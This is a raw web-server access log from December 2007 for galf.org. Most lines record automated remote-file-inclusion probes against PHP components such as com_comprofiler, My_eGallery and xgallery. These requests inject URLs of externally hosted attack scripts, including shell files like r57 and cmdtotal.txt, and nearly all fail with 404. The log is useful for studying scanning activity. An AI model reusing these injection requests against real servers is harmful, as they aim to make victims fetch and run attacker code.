88.84.147.165 - - [02/Dec/2007:17:23:29 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:23:31 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.191.26.16 - - [02/Dec/2007:17:24:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/safeon.txt?http://l1nk3d.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.191.26.16 - - [02/Dec/2007:17:24:34 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/safeon.txt?http://l1nk3d.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
86.152.212.153 - - [02/Dec/2007:17:25:09 -0800] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
86.152.212.153 - - [02/Dec/2007:17:25:11 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
67.15.156.35 - - [02/Dec/2007:17:25:11 -0800] "GET /logs/access_070910.log//index.php?path=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.152.212.153 - - [02/Dec/2007:17:25:11 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.galf.org"
67.15.156.35 - - [02/Dec/2007:17:25:11 -0800] "GET //index.php?path=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.156.35 - - [02/Dec/2007:17:25:12 -0800] "GET /logs//index.php?path=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.152.212.153 - - [02/Dec/2007:17:25:21 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:25:56 -0800] "GET /logs/access_071029.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:25:57 -0800] "GET /logs/access_071029.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.156.35 - - [02/Dec/2007:17:27:47 -0800] "GET /logs/access_070820.log//index.php?path=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:17:28:08 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:17:28:08 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:17:28:08 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:49 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:50 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:50 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:50 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:50 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:28:50 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:17:29:07 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.3.238.151 - - [02/Dec/2007:17:29:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:17:29:07 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:17:29:34 -0800] "GET /logs/access_070813.log/index.php?page=&lang=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:17:30:21 -0800] "GET /logs/access_071112.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:17:30:21 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:17:30:21 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.89.224.76 - - [02/Dec/2007:17:32:09 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 8626894 "-" "Wget/1.10.2" "galf.org"
217.151.228.18 - - [02/Dec/2007:17:32:15 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:17:33:23 -0800] "GET /logs/access_071105.log/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:17:33:24 -0800] "GET /default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:17:33:24 -0800] "GET /logs/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
200.165.167.234 - - [02/Dec/2007:17:33:31 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://66.178.229.178/aaa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.165.167.234 - - [02/Dec/2007:17:33:38 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://66.178.229.178/aaa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.165.167.234 - - [02/Dec/2007:17:33:45 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://66.178.229.178/aaa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:34:52 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.173 - - [02/Dec/2007:17:35:17 -0800] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:35:51 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:17:36:31 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:17:38:22 -0800] "GET /logs/access_070917.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:42:34 -0800] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:42:34 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:43:44 -0800] "GET /logs/access_071029.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:45:17 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:45:17 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:47:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:47:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:49:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:49:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.40.105 - - [02/Dec/2007:17:49:24 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:17:49:45 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.98.208.86 - - [02/Dec/2007:17:50:48 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.200.222.182 - - [02/Dec/2007:17:50:56 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.227.80.157 - - [02/Dec/2007:17:51:32 -0800] "GET /logs/access_071029.log//step_one.php?server_inc=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.80.157 - - [02/Dec/2007:17:51:32 -0800] "GET //step_one.php?server_inc=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.80.157 - - [02/Dec/2007:17:51:32 -0800] "GET /logs//step_one.php?server_inc=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.80.157 - - [02/Dec/2007:17:51:33 -0800] "GET /logs/access_071028.log//step_one.php?server_inc=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.246.40.105 - - [02/Dec/2007:17:52:01 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.246.40.105 - - [02/Dec/2007:17:52:01 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:17:52:06 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:17:52:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:17:52:07 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.40.105 - - [02/Dec/2007:17:52:26 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:17:53:01 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:17:53:02 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:17:53:39 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.208.86 - - [02/Dec/2007:17:53:48 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.208.86 - - [02/Dec/2007:17:53:48 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.144.225.125 - - [02/Dec/2007:17:54:00 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.144.225.125 - - [02/Dec/2007:17:54:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.98.208.86 - - [02/Dec/2007:17:54:12 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.200.222.182 - - [02/Dec/2007:17:54:59 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.222.182 - - [02/Dec/2007:17:54:59 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.222.182 - - [02/Dec/2007:17:55:30 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.112.19.23 - - [02/Dec/2007:17:56:03 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.112.19.23 - - [02/Dec/2007:17:56:03 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.112.19.23 - - [02/Dec/2007:17:56:03 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.112.19.23 - - [02/Dec/2007:17:56:09 -0800] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.60.74.106 - - [02/Dec/2007:17:56:24 -0800] "GET /index.php3?id=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:17:56:29 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:17:56:29 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:17:56:29 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:17:56:57 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.173 - - [02/Dec/2007:17:57:09 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:57:14 -0800] "GET /index.php?nic=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:57:14 -0800] "GET /logs/index.php?nic=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
70.112.19.23 - - [02/Dec/2007:17:58:07 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.colorsplashpaintball.com/enhanced/components/com_extcalendar/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.122.224.146 - - [02/Dec/2007:17:58:21 -0800] "GET /logs/access_071105.log/default.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:17:58:24 -0800] "GET /logs/default.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:17:59:53 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.200.255.149 - - [02/Dec/2007:17:59:53 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.165.167.234 - - [02/Dec/2007:18:00:01 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://66.178.229.178/aaa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:00:55 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:00:55 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:00:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:00:59 -0800] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:15 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:15 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:18 -0800] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:22 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:22 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:02:25 -0800] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.246.98 - - [02/Dec/2007:18:02:37 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.246.98 - - [02/Dec/2007:18:02:37 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.246.98 - - [02/Dec/2007:18:02:37 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
